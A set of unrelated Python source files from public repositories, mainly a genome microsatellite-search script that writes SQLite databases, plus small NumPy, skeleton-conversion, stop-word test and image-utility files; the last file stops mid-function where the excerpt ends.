scripts/searcher.py | lmdu/PanMicrosatDB | 0 | 12770762 | <gh_stars>0
import os
import sys
import csv
import gzip
import time
import json
import numpy
import queue
import signal
import shutil
import sqlite3
import traceback
import itertools
import collections
import multiprocessing
from ..thirds import kseq, ncls, tandem
from ..thirds.motifs import MotifStandard
from ..config import Config
#minimum tandem repeats
# One threshold per motif length: index 0 = mononucleotide ... index 5 =
# hexanucleotide.  A run must reach this many repeats to count as an SSR.
min_tandem_repeats = [12, 7, 5, 4, 4, 4]
#min_tandem_repeats = [6, 3, 3, 3, 3, 3]
def make_folder(folder):
    """Create *folder* (and any missing parents) if it does not exist.

    Uses ``exist_ok=True`` so the operation is atomic with respect to the
    existence test: the original check-then-create pattern could raise
    FileExistsError when two worker processes raced on the same path.
    """
    os.makedirs(folder, exist_ok=True)
def concatenate_cssr(seqid, seq, cssrs):
    """Merge consecutive SSRs into one compound-SSR database row.

    Each element of *cssrs* is an SSR tuple ``(motif, type, repeats, start,
    end, length)`` with 1-based inclusive coordinates on *seq*.  Returns a
    row ``(None, seqid, start, end, complexity, length, structure)`` where
    *structure* interleaves ``(motif)repeats`` units with the literal gap
    sequence between neighbouring SSRs.
    """
    first_start = cssrs[0][3]
    last_end = cssrs[-1][4]
    pieces = []
    for idx in range(len(cssrs)):
        motif, repeats = cssrs[idx][0], cssrs[idx][2]
        pieces.append("({}){}".format(motif, repeats))
        if idx + 1 < len(cssrs):
            # literal bases between this SSR's end and the next SSR's start
            pieces.append(seq[cssrs[idx][4]:cssrs[idx + 1][3] - 1])
    return (None, seqid, first_start, last_end, len(cssrs),
            last_end - first_start + 1, "".join(pieces))
class Data(dict):
    """A dict whose keys can also be read and written as attributes."""

    def __getattr__(self, key):
        # Only reached when normal attribute lookup fails; fall back to
        # the mapping and surface missing keys as AttributeError so that
        # hasattr()/getattr() behave as expected.
        if key in self:
            return self[key]
        raise AttributeError(key)

    def __setattr__(self, key, value):
        # Every attribute assignment is stored as a dictionary entry.
        self[key] = value
def gff_parser(annot_file):
    """Yield one ``Data`` record per feature line of a gzipped GFF file.

    Each record exposes ``seqid``, ``feature`` (upper-cased), ``start``,
    ``end`` and ``attrs`` (a ``Data`` mapping of upper-cased attribute
    names to their raw values).  Comment lines starting with '#' are
    skipped.
    """
    with gzip.open(annot_file, 'rt') as fh:
        for line in fh:
            if line[0] == '#': continue
            cols = line.strip().split('\t')
            record = Data(
                seqid = cols[0],
                feature = cols[2].upper(),
                start = int(cols[3]),
                end = int(cols[4]),
                attrs = Data()
            )
            for item in cols[-1].split(';'):
                if not item:
                    continue
                # Split on the FIRST '=' only: attribute values such as
                # Dbxref URLs may themselves contain '=' characters, which
                # made the original two-target unpacking raise ValueError.
                name, value = item.split('=', 1)
                record.attrs[name.strip().upper()] = value
            yield record
def get_gff_coordinate(gff_file):
    """Yield ``(seqid, start, end, feature_type, gene_id)`` tuples for CDS,
    UTRs, exons and (derived) introns of a gzipped GFF file.

    Genes are tracked in ``parents`` so that every yielded feature carries
    its top-level gene identifier.  Exons are buffered per transcript
    (``father``/``mother`` hold the current/next transcript id); when the
    transcript changes, the buffered exons are flushed sorted by end
    coordinate and introns are synthesised from the gaps between them.
    """
    father = None
    exons = []
    parents = {}
    for r in gff_parser(gff_file):
        if r.feature == 'REGION':
            continue
        elif r.feature == 'GENE':
            # Remember every alias a gene may be referenced by downstream.
            if 'ID' in r.attrs:
                parents[r.attrs.ID] = r.attrs.ID
            elif 'GENE' in r.attrs:
                parents[r.attrs.GENE] = r.attrs.GENE
                parents['gene-{}'.format(r.attrs.GENE)] = r.attrs.GENE
            elif 'NAME' in r.attrs:
                parents[r.attrs.NAME] = r.attrs.NAME
        elif r.feature == 'CDS':
            if 'PARENT' in r.attrs:
                yield (r.seqid, r.start, r.end, 'CDS', parents[r.attrs.PARENT])
            else:
                yield (r.seqid, r.start, r.end, 'CDS', r.attrs.ID)
        elif r.feature == 'FIVE_PRIME_UTR':
            if 'PARENT' in r.attrs:
                yield (r.seqid, r.start, r.end, '5UTR', parents[r.attrs.PARENT])
            else:
                yield (r.seqid, r.start, r.end, '5UTR', r.attrs.ID)
        elif r.feature == 'THREE_PRIME_UTR':
            if 'PARENT' in r.attrs:
                yield (r.seqid, r.start, r.end, '3UTR', parents[r.attrs.PARENT])
            else:
                yield (r.seqid, r.start, r.end, '3UTR', r.attrs.ID)
        elif r.feature == 'EXON':
            try:
                mother = r.attrs.PARENT
            except AttributeError:
                continue
            if father == mother:
                # Same transcript: keep buffering its exons.
                exons.append((r.seqid, r.start, r.end, 'exon', parents[r.attrs.PARENT]))
            else:
                # New transcript: flush the previous one's exons and the
                # introns inferred from the gaps between adjacent exons.
                if exons:
                    exons = sorted(exons, key=lambda x: x[2])
                    for idx, exon in enumerate(exons):
                        yield exon
                        if idx < len(exons)-1:
                            start = exon[2] + 1
                            end = exons[idx+1][1] - 1
                            yield (exons[0][0], start, end, 'intron', parents[r.attrs.PARENT])
                exons = [(r.seqid, r.start, r.end, 'exon', parents[r.attrs.PARENT])]
                father = mother
        else:
            # Any other feature type (mRNA, transcript, ...): record its ID
            # as an alias of its parent gene so children resolve correctly.
            if 'ID' in r.attrs:
                try:
                    parents[r.attrs.ID] = parents[r.attrs.PARENT]
                except:
                    parents[r.attrs.ID] = r.attrs.ID
    # Flush the final transcript's buffered exons and derived introns.
    exons = sorted(exons, key=lambda x: x[2])
    for idx, exon in enumerate(exons):
        yield exon
        if idx < len(exons)-1:
            start = exon[2] + 1
            end = exons[idx+1][1] - 1
            yield (exons[0][0], start, end, 'intron', exons[0][4])
TABLE_SQL = """
CREATE TABLE sequence(
id INTEGER,
name TEXT,
accession TEXT
);
CREATE TABLE ssr(
id INTEGER PRIMARY KEY,
sequence_id INTEGER,
start INTEGER,
end INTEGER,
motif TEXT,
standard_motif TEXT,
ssr_type INTEGER,
repeats INTEGER,
length INTEGER
);
CREATE TABLE ssrmeta(
ssr_id INTEGER PRIMARY KEY,
left_flank TEXT,
right_flank TEXT
);
CREATE TABLE gene(
id INTEGER PRIMARY KEY,
sequence_id INTEGER,
start INTEGER,
end INTEGER,
gid TEXT,
name TEXT,
biotype TEXT,
dbxref TEXT
);
CREATE TABLE ssrannot(
ssr_id INTEGER PRIMARY KEY,
gene_id INTEGER,
location INTEGER
);
CREATE TABLE cssr(
id INTEGER PRIMARY KEY,
sequence_id INTEGER,
start INTEGER,
end INTEGER,
complexity INTEGER,
length INTEGER,
structure TEXT
);
CREATE TABLE cssrmeta(
cssr_id INTEGER PRIMARY KEY,
left_flank TEXT,
right_flank TEXT
);
CREATE TABLE cssrannot(
cssr_id INTEGER PRIMARY KEY,
gene_id INTEGER,
location INTEGER
);
CREATE TABLE summary(
id INTEGER PRIMARY KEY,
option TEXT,
content TEXT
);
"""
INDEX_SQL = """
CREATE INDEX seq_name ON sequence (name);
CREATE INDEX seq_acc ON sequence (accession);
CREATE INDEX ssr_seq_id ON ssr (sequence_id);
CREATE INDEX ssr_start ON ssr (start);
CREATE INDEX ssr_end ON ssr (end);
CREATE INDEX ssr_motif ON ssr (motif);
CREATE INDEX ssr_smotif ON ssr (standard_motif);
CREATE INDEX ssr_stype ON ssr (ssr_type);
CREATE INDEX ssr_rep ON ssr (repeats);
CREATE INDEX ssr_len ON ssr (length);
CREATE INDEX ssr_annot_gene_id ON ssrannot (gene_id);
CREATE INDEX ssr_annot_location ON ssrannot (location);
CREATE INDEX ssr_annot_ssr_gene ON ssrannot (ssr_id, gene_id);
CREATE INDEX ssr_annot_ssr_gene_loc ON ssrannot (ssr_id, gene_id, location);
CREATE INDEX cssr_seq_id ON cssr (sequence_id);
CREATE INDEX cssr_start ON cssr (start);
CREATE INDEX cssr_end ON cssr (end);
CREATE INDEX cssr_cplx ON cssr (complexity);
CREATE INDEX cssr_len ON cssr (length);
CREATE INDEX cssr_annot_gene_id ON cssrannot (gene_id);
CREATE INDEX cssr_annot_location ON cssrannot (location);
CREATE INDEX cssr_annot_cssr_gene ON cssrannot (cssr_id, gene_id);
CREATE INDEX cssr_annot_cssr_gene_loc ON cssrannot (cssr_id, gene_id, location);
"""
WORK_DIR = Config.ROOT_DIR
DB_DIR = os.path.join(WORK_DIR, 'dbs')
FA_DIR = os.path.join(WORK_DIR, 'fastas')
AR_DIR = os.path.join(WORK_DIR, 'assemblyreports')
GFF_DIR = os.path.join(WORK_DIR, 'gffs')
def search_for_ssrs(acc, sub_dir):
    """Build the complete SSR database for one genome assembly.

    Reads the gzipped FASTA for accession *acc* under *sub_dir*, searches
    every sequence for perfect and compound microsatellites, extracts
    100 bp flanking sequences, maps each SSR onto gene features from the
    GFF annotation (when present), computes summary statistics and writes
    everything into ``DB_DIR/sub_dir/acc.db`` (recreated from scratch).

    Raises:
        Exception: if the FASTA file for *acc* does not exist.
    """
    #standard motif
    motifs = MotifStandard(2)

    out_dir = os.path.join(DB_DIR, sub_dir)
    db_file = os.path.join(out_dir, '{}.db'.format(acc))
    fa_file = os.path.join(FA_DIR, sub_dir, '{}.fna.gz'.format(acc))
    ar_file = os.path.join(AR_DIR, sub_dir, '{}.assembly_report.txt'.format(acc))
    gff_file = os.path.join(GFF_DIR, sub_dir, '{}.gff.gz'.format(acc))

    if not os.path.exists(fa_file):
        raise Exception('{} does not exists'.format(fa_file))

    #if database file exists, remove and redo search for SSRs
    if os.path.exists(db_file):
        os.remove(db_file)

    #connect to database and create tables
    conn = sqlite3.connect(db_file)
    cursor = conn.cursor()
    cursor.executescript(TABLE_SQL)

    #write speedup
    # Durability is traded for insert throughput; the whole file is rebuilt
    # on failure anyway, so losing it on a crash is acceptable.
    cursor.execute("PRAGMA synchronous = OFF;")
    cursor.execute("PRAGMA journal_mode = MEMORY;")
    cursor.execute("PRAGMA cache_size = 10000;")
    cursor.execute("BEGIN;")

    ##parse assembly report
    #specifiy accession column
    # RefSeq assemblies (GCF_*) carry their accession in column 6 of the
    # report, GenBank assemblies (GCA_*) in column 4.
    if acc.startswith('GCF'):
        accn_col = 6
    else:
        accn_col = 4

    seqs_mapping = {}
    num = 0
    mitochondrion = None
    rows = []
    if os.path.exists(ar_file):
        with open(ar_file) as fh:
            for line in fh:
                if line[0] == '#':
                    continue

                if not line.strip():
                    continue

                cols = line.strip().split('\t')
                name = cols[0]

                #genbank or refseq accession number
                accn = cols[accn_col]

                num += 1

                # The mitochondrial sequence is excluded from SSR search.
                if 'mitochondrion' in cols[3].lower():
                    mitochondrion = accn

                seqs_mapping[accn] = num

                # Give assembled chromosomes a human-friendly "ChrN" label.
                if 'chromosome' in cols[3].lower():
                    if cols[0].isdigit() and len(cols[0]) <= 2:
                        name = 'Chr{}'.format(cols[0])
                    elif cols[0] in ['X', 'Y', 'W', 'Z']:
                        name = 'Chr{}'.format(cols[0])

                rows.append((num, name, accn))

    #if assembly report file is empty, get sequence name from fasta file
    if not rows:
        with gzip.open(fa_file, 'rt') as fa:
            for line in fa:
                if line[0] == '>':
                    num += 1
                    name = line[1:].strip().split()[0]
                    seqs_mapping[name] = num
                    rows.append((num, name, name))
    #refseq-accn column is empty
    # Fall back to pairing FASTA headers with the report's name/GenBank
    # columns when the chosen accession column was blank.
    elif '' in seqs_mapping:
        seqname_to_gbaccn = {}
        with open(ar_file) as fh:
            for line in fh:
                if line[0] == '#':
                    continue

                if not line.strip():
                    continue

                cols = line.strip().split('\t')
                seqname_to_gbaccn[cols[0]] = cols[4]

        with gzip.open(fa_file, 'rt') as fa:
            for line in fa:
                if line[0] == '>':
                    num += 1
                    refacc = line[1:].strip().split()[0]
                    seqs_mapping[refacc] = num

                    for k,v in seqname_to_gbaccn.items():
                        if (k.strip() and k in line) or (v.strip() and v in line):
                            name = k.strip() or v.strip()
                            rows.append((num, name, refacc))

    cursor.executemany("INSERT INTO sequence VALUES (?,?,?)", rows)

    ##Search for microsatellites and extract flanking sequence
    base_count = 0
    atgc_count = 0
    gc_count = 0
    at_count = 0
    seq_count = 0
    for seqid, seq in kseq.fasta(fa_file):
        if seqid == mitochondrion:
            continue

        seq_count += 1
        base_count += len(seq)
        bases = collections.Counter(seq)
        gc_count += bases['G'] + bases['C']
        atgc_count += bases['G'] + bases['C'] + bases['A'] + bases['T']

        #Search for perfect microsatellites
        ssrs = tandem.search_ssr(seq, min_tandem_repeats)

        if not ssrs:
            continue

        def iter_ssr():
            # SSR tuple layout from tandem.search_ssr:
            # (motif, type, repeats, start, end, length)
            for ssr in ssrs:
                yield (None, seqs_mapping[seqid], ssr[3], ssr[4], ssr[0], motifs.get_standard(ssr[0]), ssr[1], ssr[2], ssr[5])

        conn.cursor().executemany("INSERT INTO ssr VALUES (?,?,?,?,?,?,?,?,?)", iter_ssr())

        #extract flanking sequence for SSRs
        def iter_flank():
            for row in cursor.execute("SELECT * FROM ssr WHERE sequence_id=?", (seqs_mapping[seqid],)):
                # 100 bp on each side, clamped at the start of the sequence.
                s = row[2] - 100 - 1
                if s < 0:
                    s = 0
                left = seq[s:row[2]-1]
                right = seq[row[3]:row[3]+100]
                yield (row[0], left, right)

        conn.cursor().executemany("INSERT INTO ssrmeta VALUES (?,?,?)", iter_flank())

        #search for compound microsatellites
        def iter_cssr():
            # Adjacent SSRs separated by at most 10 bp are merged into one
            # compound SSR via concatenate_cssr.
            cssrs = [ssrs[0]]
            for ssr in ssrs[1:]:
                d = ssr[3] - cssrs[-1][4] - 1
                if d<= 10:
                    cssrs.append(ssr)
                else:
                    if len(cssrs) > 1:
                        yield concatenate_cssr(seqs_mapping[seqid], seq, cssrs)
                    cssrs = [ssr]

            if len(cssrs) > 1:
                yield concatenate_cssr(seqs_mapping[seqid], seq, cssrs)

        conn.cursor().executemany("INSERT INTO cssr VALUES (?,?,?,?,?,?,?)", iter_cssr())

        #extract flanking sequence for cSSRs
        def iter_cflank():
            for row in cursor.execute("SELECT * FROM cssr WHERE sequence_id=?", (seqs_mapping[seqid],)):
                s = row[2] - 100 - 1
                if s < 0:
                    s = 0
                left = seq[s:row[2]-1]
                right = seq[row[3]:row[3]+100]
                yield (row[0], left, right)

        conn.cursor().executemany("INSERT INTO cssrmeta VALUES (?,?,?)", iter_cflank())

    #if annotation file exists, mapping ssr in gene
    if os.path.exists(gff_file):
        #extract all genes from gff annotation file
        gene_mapping = {}
        def iter_gene():
            gene_num = 0
            for row in gff_parser(gff_file):
                if row.feature == 'REGION':
                    continue

                if row.feature != 'GENE':
                    if 'PARENT' in row.attrs:
                        continue

                gene_num += 1

                if 'ID' in row.attrs:
                    gid = row.attrs.ID
                elif 'GENE' in row.attrs:
                    gid = row.attrs.GENE
                elif 'NAME' in row.attrs:
                    gid = row.attrs.NAME
                else:
                    raise Exception(row)

                gene_mapping[gid] = gene_num

                if row.seqid not in seqs_mapping:
                    continue

                seqid = seqs_mapping[row.seqid]

                if 'NAME' in row.attrs:
                    gname = row.attrs.NAME
                elif 'PRODUCT' in row.attrs:
                    gname = row.attrs.PRODUCT
                elif 'GENE' in row.attrs:
                    gname = row.attrs.GENE
                elif 'ID' in row.attrs:
                    gname = row.attrs.ID
                else:
                    raise Exception(row)

                biotype = row.attrs.get('GENE_BIOTYPE', row.feature)
                dbxref = row.attrs.get('DBXREF', '')

                yield (gene_num, seqid, row.start, row.end, gid, gname, biotype, dbxref)

        conn.cursor().executemany("INSERT INTO gene VALUES (?,?,?,?,?,?,?,?)", iter_gene())

        #do mapping
        # Build one nested containment list (NCLS) per chromosome so SSR
        # coordinates can be intersected with gene features quickly.
        interval_forest = {}
        locations = {}
        locid = 0
        prev_chrom = None
        starts = []
        ends = []
        indexes = []
        for feature in get_gff_coordinate(gff_file):
            locid += 1
            locations[locid] = feature[3:]

            if feature[0] != prev_chrom:
                if starts:
                    starts = numpy.array(starts, dtype=numpy.long)
                    ends = numpy.array(ends, dtype=numpy.long)
                    indexes = numpy.array(indexes, dtype=numpy.long)
                    interval_forest[prev_chrom] = ncls.NCLS(starts, ends, indexes)

                prev_chrom = feature[0]
                starts = []
                ends = []
                indexes = []

            starts.append(feature[1])
            ends.append(feature[2])
            indexes.append(locid)

        # Flush the interval tree of the final chromosome.
        if starts:
            starts = numpy.array(starts, dtype=numpy.long)
            ends = numpy.array(ends, dtype=numpy.long)
            indexes = numpy.array(indexes, dtype=numpy.long)
            interval_forest[prev_chrom] = ncls.NCLS(starts, ends, indexes)

        feature_to_id = {'CDS': 1, 'exon': 2, '3UTR': 3, 'intron': 4, '5UTR': 5}
        # Priority order when an SSR overlaps several features at once.
        candidates = ['CDS', 'exon', 'UTR', 'intron']
        seqid_to_name = dict(zip(seqs_mapping.values(), seqs_mapping.keys()))

        #mapping ssr
        mappings = []
        for ssr in cursor.execute("SELECT * FROM ssr"):
            seqname = seqid_to_name[ssr[1]]
            if seqname not in interval_forest:
                continue

            res = set(interval_forest[seqname].find_overlap(ssr[2], ssr[3]))
            if not res:
                continue

            feats = [locations[fid[2]] for fid in res]

            # Record only the highest-priority overlapping feature.
            for candidate in candidates:
                for feat, gid in feats:
                    if candidate in feat:
                        mappings.append((ssr[0], gene_mapping[gid], feature_to_id[feat]))
                        break
                else:
                    continue
                break

        conn.cursor().executemany("INSERT INTO ssrannot VALUES (?,?,?)", mappings)

        #mapping cssr
        mappings = []
        for ssr in cursor.execute("SELECT * FROM cssr"):
            seqname = seqid_to_name[ssr[1]]
            if seqname not in interval_forest:
                continue

            res = set(interval_forest[seqname].find_overlap(ssr[2], ssr[3]))
            if not res:
                continue

            feats = [locations[fid[2]] for fid in res]

            for candidate in candidates:
                for feat, gid in feats:
                    if candidate in feat:
                        mappings.append((ssr[0], gene_mapping[gid], feature_to_id[feat]))
                        break
                else:
                    continue
                break

        conn.cursor().executemany("INSERT INTO cssrannot VALUES (?,?,?)", mappings)

    #statistics
    def set_option(name, val):
        # Store one key/value row in the summary table.
        conn.cursor().execute("INSERT INTO summary VALUES (?,?,?)", (None, name, val))

    def get_one(sql):
        # Return the first column of the first row of *sql*, or 0.
        cur = conn.cursor()
        for row in cur.execute(sql):
            if row[0] is None:
                return 0
            return row[0]
        return 0

    set_option('genome_size', base_count)
    set_option('valid_size', atgc_count)
    set_option('seq_count', seq_count)
    set_option('ns_count', base_count-atgc_count)
    set_option('gc_content', round(gc_count/atgc_count*100, 2))

    #SSR Statistics
    ssr_count = get_one("SELECT COUNT(*) FROM ssr LIMIT 1")
    if ssr_count > 0:
        set_option('ssr_count', ssr_count)
        ssr_length = get_one("SELECT SUM(length) FROM ssr LIMIT 1")
        set_option('ssr_length', ssr_length)
        ssr_average = ssr_length/ssr_count
        set_option('ssr_average', ssr_average)
        ssr_frequency = ssr_count/(atgc_count/1000000)
        set_option('ssr_frequency', ssr_frequency)
        ssr_density = ssr_length/(atgc_count/1000000)
        set_option('ssr_density', ssr_density)
        genome_cover= ssr_length/atgc_count*100
        set_option('genome_cover', genome_cover)
        set_option('ssr_perseq', ssr_count/seq_count)

        ssr_category = 0
        for row in cursor.execute("SELECT COUNT(DISTINCT standard_motif) FROM ssr"):
            ssr_category = row[0]
        set_option('ssr_category', ssr_category)

        ssr_maxrep = ''
        for row in cursor.execute("SELECT motif, max(repeats) FROM ssr"):
            ssr_maxrep = '{} / {}'.format(row[1], row[0])
        set_option('ssr_maxrep', ssr_maxrep)

        ssr_maxlen = ''
        for row in cursor.execute("SELECT motif, max(length) FROM ssr"):
            ssr_maxlen = '{} / {}'.format(row[1], row[0])
        set_option('ssr_maxlen', ssr_maxlen)

        types = {1: 'Mono', 2: 'Di', 3: 'Tri', 4: 'Tetra', 5: 'Penta', 6: 'Hexa'}
        res = {types[row[0]]: row[1] for row in cursor.execute("SELECT ssr_type, count(*) FROM ssr GROUP BY ssr_type")}
        set_option('ssr_types', json.dumps(res))

        feats = {1: 'CDS', 2: 'exon', 3: '3UTR', 4: 'intron', 5: '5UTR'}
        res = {feats[row[0]]: row[1] for row in cursor.execute("SELECT location, COUNT(*) FROM ssrannot GROUP BY location")}
        set_option('ssr_location', json.dumps(res))

        res = {row[0]: row[1] for row in cursor.execute("SELECT standard_motif, COUNT(*) FROM ssr GROUP BY standard_motif")}
        set_option('ssr_motif', json.dumps(res))

        res = {}
        for i in range(1, 7):
            res[types[i]] = {row[0]: row[1] for row in cursor.execute("SELECT repeats, COUNT(*) FROM ssr WHERE ssr_type=? GROUP BY repeats", (i,))}
        set_option('ssr_repdis', json.dumps(res))

        res = {}
        for i in range(1, 7):
            res[types[i]] = {row[0]: row[1] for row in cursor.execute("SELECT length, COUNT(*) FROM ssr WHERE ssr_type=? GROUP BY length", (i,))}
        set_option('ssr_lendis', json.dumps(res))

    #Compound microsatellite statistics
    cm_count = get_one("SELECT COUNT(*) FROM cssr LIMIT 1")
    if cm_count > 0:
        set_option('cm_count', cm_count)
        cssr_count = get_one("SELECT SUM(complexity) FROM cssr LIMIT 1")
        set_option('cssr_count', cssr_count)
        cssr_length = get_one("SELECT SUM(length) FROM cssr LIMIT 1")
        set_option('cssr_length', cssr_length)
        cssr_average = cssr_length/cm_count
        set_option('cssr_average', cssr_average)
        cssr_percent = cssr_count/ssr_count*100
        set_option('cssr_percent', cssr_percent)
        cssr_frequency = cm_count/(atgc_count/1000000)
        set_option('cssr_frequency', cssr_frequency)
        cssr_density = cssr_length/(atgc_count/100000)
        set_option('cssr_density', cssr_density)
        cssr_perseq = cm_count/seq_count*100
        set_option('cssr_perseq', cssr_perseq)
        cssr_maxlen = get_one("SELECT MAX(length) FROM cssr")
        set_option('cssr_maxlen', cssr_maxlen)
        cssr_maxcpl = get_one("SELECT MAX(complexity) FROM cssr")
        set_option('cssr_maxcpl', cssr_maxcpl)
        res = {row[0]: row[1] for row in cursor.execute("SELECT complexity, COUNT(*) FROM cssr GROUP BY complexity")}
        set_option('cssr_cpldis', json.dumps(res))
        res = {row[0]: row[1] for row in cursor.execute("SELECT length, COUNT(*) FROM cssr GROUP BY length")}
        set_option('cssr_lendis', json.dumps(res))

    # Indexes are built last so the bulk inserts above stay fast.
    cursor.executescript(INDEX_SQL)
    conn.commit()
    conn.close()
# Shared, process-safe primitives used by the worker processes below.
manager = multiprocessing.Manager()
event = manager.Event()     # set by the main process once all tasks are queued
tasks = manager.Queue(150)  # bounded queue of (accession, sub_dir) work items
lock = manager.Lock()       # serialises appends to the progress log file
def worker(logfile):
    """Worker-process loop: drain the shared task queue and run the search.

    Pulls ``(accession, sub_dir)`` items from the global ``tasks`` queue and
    runs :func:`search_for_ssrs` on each.  Exits when the global ``event``
    is set AND the queue is empty.  On any failure the whole process group
    is killed (a single bad genome aborts the run).  Successful accessions
    are appended to *logfile* under the global ``lock`` so the run can be
    resumed later.
    """
    while 1:
        if event.is_set() and tasks.empty():
            break

        if tasks.empty():
            time.sleep(0.01)
            continue

        try:
            try:
                acc, sub_dir = tasks.get_nowait()
            except queue.Empty:
                time.sleep(0.01)
                continue
            search_for_ssrs(acc, sub_dir)
        except:
            # Deliberately broad: any failure (including BaseException)
            # aborts the whole process group below.
            # NOTE(review): if get_nowait itself failed with something other
            # than queue.Empty, 'acc' is unbound here — TODO confirm intent.
            print('{}\tFailure'.format(acc))
            # Bug fix: the original wrapped this call in print(), which
            # printed the literal 'None' (print_exc returns None after
            # writing the traceback to stderr).
            traceback.print_exc()
            os.killpg(os.getpgid(os.getpid()), signal.SIGKILL)

        print('{}\tSuccess'.format(acc))

        # 'with lock' guarantees release even if opening/writing the log
        # raises (the original acquire/release pair could leak the lock).
        with lock:
            with open(logfile, 'a') as fh:
                fh.write('{}\n'.format(acc))

    return
if __name__ == '__main__':
    ## main process started ##
    # Usage: searcher.py <genome_list.tsv> <progress_log> <cpu_count>
    genome_accession_list_file, progress_log_file, cpu_count = sys.argv[1:]
    cpu_count = int(cpu_count)

    #breakpoint resume
    # Accessions already listed in the progress log are skipped below.
    finished = {}
    if os.path.exists(progress_log_file):
        with open(progress_log_file) as fh:
            finished = {line.strip() for line in fh}

    genomes = {}
    with open(genome_accession_list_file) as fh:
        rows = csv.reader(fh, delimiter='\t')
        for row in rows:
            #accession of genomes list in column 15
            genomes[row[15]] = row

    # Start the worker pool; each worker loops on the shared task queue.
    pool = multiprocessing.Pool(cpu_count)
    for i in range(cpu_count):
        pool.apply_async(worker, (progress_log_file,))

    for acc, info in genomes.items():
        if acc in finished:
            continue

        # Keep only the first name when the taxon field lists several.
        if ',' in info[4]:
            info[4] = info[4].split(',')[0]

        # Output layout mirrors columns 3-5 (kingdom/group/subgroup).
        sub_dir = os.path.join(*info[3:6]).replace(' ', '_')
        out_dir = os.path.join(DB_DIR, sub_dir)
        make_folder(out_dir)

        # Busy-wait until the bounded queue has room for the next task.
        while 1:
            try:
                tasks.put_nowait((acc, sub_dir))
                break
            except queue.Full:
                time.sleep(0.01)

    # Signal the workers that no more tasks will arrive, then wait.
    event.set()
    pool.close()
    pool.join()
| 2.203125 | 2 |
WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/python_NumPy_Summations_2.txt.py | webdevhub42/Lambda | 5 | 12770763 | import numpy as np
arr1 = np.array([1, 2, 3])
arr2 = np.array([1, 2, 3])
# np.sum over a *list* of arrays with no axis argument reduces over every
# element of both arrays, so this prints the grand total 12 (not [2, 4, 6]).
newarr = np.sum([arr1, arr2])
print(newarr)
| 3.234375 | 3 |
nobos_commons/tools/skeleton_converters/skeleton_converter_openpose_to_stickman.py | noboevbo/nobos_commons | 2 | 12770764 | <reponame>noboevbo/nobos_commons
from nobos_commons.data_structures.skeletons.joint_2d import Joint2D
from nobos_commons.data_structures.skeletons.skeleton_openpose import SkeletonOpenPose
from nobos_commons.data_structures.skeletons.skeleton_stickman import SkeletonStickman
from nobos_commons.tools.skeleton_converters.skeleton_converter_base import SkeletonConverter
from nobos_commons.utils.joint_helper import get_middle_joint
class SkeletonConverterOpenPoseToStickman(SkeletonConverter):
    """Converts an OpenPose skeleton into the Stickman joint layout."""

    def get_converted_skeleton(self, skeleton_openpose: SkeletonOpenPose) -> SkeletonStickman:
        converted = self._get_skeleton_from_joints(skeleton_openpose)
        self._set_calculated_joints(converted)
        return converted

    # -- internal helpers ---------------------------------------------------

    def _get_skeleton_from_joints(self, skeleton_openpose: SkeletonOpenPose) -> SkeletonStickman:
        # Copy every OpenPose joint whose name also exists in the Stickman
        # layout; joints unknown to Stickman are silently dropped.
        target = SkeletonStickman()
        for source_joint in skeleton_openpose.joints:
            if hasattr(target.joints, source_joint.name):
                target.joints[source_joint.name].copy_from(source_joint, allow_different_num=True)
        return target

    def _set_calculated_joints(self, skeleton_stickman: SkeletonStickman):
        # The Stickman hip_center is not present in OpenPose output, so it
        # is derived as the midpoint between the two hip joints (when both
        # are available).
        hip_center: Joint2D = get_middle_joint(joint_a=skeleton_stickman.joints.left_hip,
                                               joint_b=skeleton_stickman.joints.right_hip)
        if hip_center is not None:
            skeleton_stickman.joints.hip_center.copy_from(hip_center)
| 2.1875 | 2 |
mots_vides/tests/shortcut.py | Fantomas42/mots-vides | 13 | 12770765 | <reponame>Fantomas42/mots-vides<filename>mots_vides/tests/shortcut.py
"""
Tests for shortcuts
"""
from unittest import TestCase
from mots_vides import stop_words
from mots_vides.stop_words import StopWord
from mots_vides.exceptions import StopWordError
class StopWordShortcutTestCase(TestCase):
    """Exercises the ``stop_words`` shortcut factory."""

    def test_stop_words(self):
        # Both a known ('french') and an unknown ('klingon') language name
        # yield a StopWord collection while fail_safe is left enabled.
        for language in ('french', 'klingon'):
            self.assertTrue(isinstance(stop_words(language), StopWord))
        # With fail_safe disabled, an unknown language raises instead.
        self.assertRaises(StopWordError, stop_words, 'klingon', False)
| 2.359375 | 2 |
rastervision_core/rastervision/core/utils/misc.py | theoway/raster-vision | 1,577 | 12770766 | <reponame>theoway/raster-vision
import io
from pydantic import confloat
from PIL import Image
import numpy as np
import imageio
import logging
# Pydantic-constrained float type for values that must lie in [0, 1].
Proportion = confloat(ge=0, le=1)
# Module-level logger for this utility module.
log = logging.getLogger(__name__)
def save_img(im_array, output_path):
    """Write *im_array* to *output_path*; imageio infers the image format
    from the file extension."""
    imageio.imwrite(output_path, im_array)
def numpy_to_png(array: np.ndarray) -> bytes:
    """Get PNG-encoded bytes from a Numpy array.

    Args:
        array: A Numpy array of shape (w, h, 3) or (w, h), where the
            former is meant to become a three-channel image and the
            latter a one-channel image. The dtype of the array
            should be uint8.

    Returns:
        bytes: the PNG-encoded image.  (``BytesIO.getvalue()`` returns
        ``bytes``; the original ``-> str`` annotation and docstring were
        wrong.)
    """
    im = Image.fromarray(array)
    output = io.BytesIO()
    im.save(output, 'png')
    return output.getvalue()
def png_to_numpy(png: bytes, dtype=np.uint8) -> np.ndarray:
    """Get a Numpy array from PNG-encoded data.

    Args:
        png: PNG-encoded image data.  (``io.BytesIO`` requires ``bytes``;
            the original ``png: str`` annotation was wrong.)
        dtype: unused; kept only for backward compatibility of the
            signature.

    Returns:
        numpy.ndarray
    """
    incoming = io.BytesIO(png)
    im = Image.open(incoming)
    return np.array(im)
| 2.8125 | 3 |
python-sdk/experimental/deploy-triton/src/score_densenet.py | 0mza987/azureml-examples | 331 | 12770767 | <gh_stars>100-1000
import io
import numpy as np
import os
from azureml.core import Model
from azureml.contrib.services.aml_request import rawhttp
from azureml.contrib.services.aml_response import AMLResponse
from PIL import Image
from onnxruntimetriton import InferenceSession
def preprocess(img, scaling):  # (third ``dtype`` param was removed upstream)
    """Pre-process an image to meet the size, type and format
    requirements specified by the parameters.

    Args:
        img: a PIL-style image (must support ``convert`` and ``resize``).
        scaling: 'INCEPTION' ((x/128)-1), 'VGG' (mean subtraction) or any
            other value for no scaling.

    Returns:
        np.float32 array in NCHW layout of shape (3, 224, 224).
    """
    c = 3
    h = 224
    w = 224
    # 'layout' replaces the original name 'format', which shadowed the
    # builtin of the same name.
